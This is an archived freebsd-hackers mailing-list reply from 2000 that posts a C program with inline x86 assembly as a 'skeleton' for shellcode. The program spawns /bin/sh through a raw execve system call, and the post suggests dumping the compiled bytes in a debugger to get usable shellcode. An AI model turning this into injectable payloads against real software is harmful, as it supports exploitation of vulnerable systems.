From owner-freebsd-hackers Thu Mar 2 9:38:47 2000
Delivered-To: freebsd-hackers@freebsd.org
Received: from kcmso1.proxy.att.com (kcmso1.att.com [192.128.133.69]) by hub.freebsd.org (Postfix) with ESMTP id 5E28137BDAD for ; Thu, 2 Mar 2000 09:38:43 -0800 (PST) (envelope-from myevmenkin@att.com)
Received: from mo3980r1.ems.att.com ([135.38.12.14]) by kcmso1.proxy.att.com (AT&T IPNS/MSO-2.2) with ESMTP id MAA05812 for ; Thu, 2 Mar 2000 12:38:41 -0500 (EST)
Received: from njb140bh1.ems.att.com by mo3980r1.ems.att.com (8.8.8+Sun/ATTEMS-1.4.1 sol2) id MAA19880; Thu, 2 Mar 2000 12:34:10 -0500 (EST)
Received: by njb140bh1.ems.att.com with Internet Mail Service (5.5.2650.21) id ; Thu, 2 Mar 2000 12:38:39 -0500
Message-ID:
From: "Yevmenkin, Maksim N, CSCIO"
To: "'Michael Kyle'" , freebsd-hackers@FreeBSD.ORG
Subject: RE: Shell Code... (fwd)
Date: Thu, 2 Mar 2000 12:34:36 -0500
MIME-Version: 1.0
X-Mailer: Internet Mail Service (5.5.2650.21)
Content-Type: text/plain; charset="iso-8859-1"
Sender: owner-freebsd-hackers@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.ORG

hello all,

in case you still need it :) here is a good skeleton for shell code :-) i DO NOT want to put REAL shell code here. just do ``x/32bx main'' and you will see what you want.
:) i'm too lazy to write in assembler and hate AT&T syntax :)

<-------------------------- cut here ------------------------------------->
char *cmd = "/bin/sh";
char *arg[] = { "sh", 0 };

void main(void)
{
	/* execve(cmd, argv, env) */

	/* pass ``env'' == NULL */
	__asm__("xorl %eax,%eax\n");
	__asm__("push %eax");

	/* pass ``argv[]'' */
	__asm__("push $arg\n");

	/* pass ``cmd'' */
	__asm__("movl $cmd,%edx\n");
	__asm__("movl (%edx),%eax\n");
	__asm__("push %eax\n");

	/* simulate ``libc call '' */
	__asm__("push %ecx\n");

	/* system call */
	__asm__("xorl %eax,%eax\n");
	__asm__("movb $0x3b,%al\n");
	__asm__("int $0x80\n");
}
<------------------------- end cut ---------------------->

thanks
emax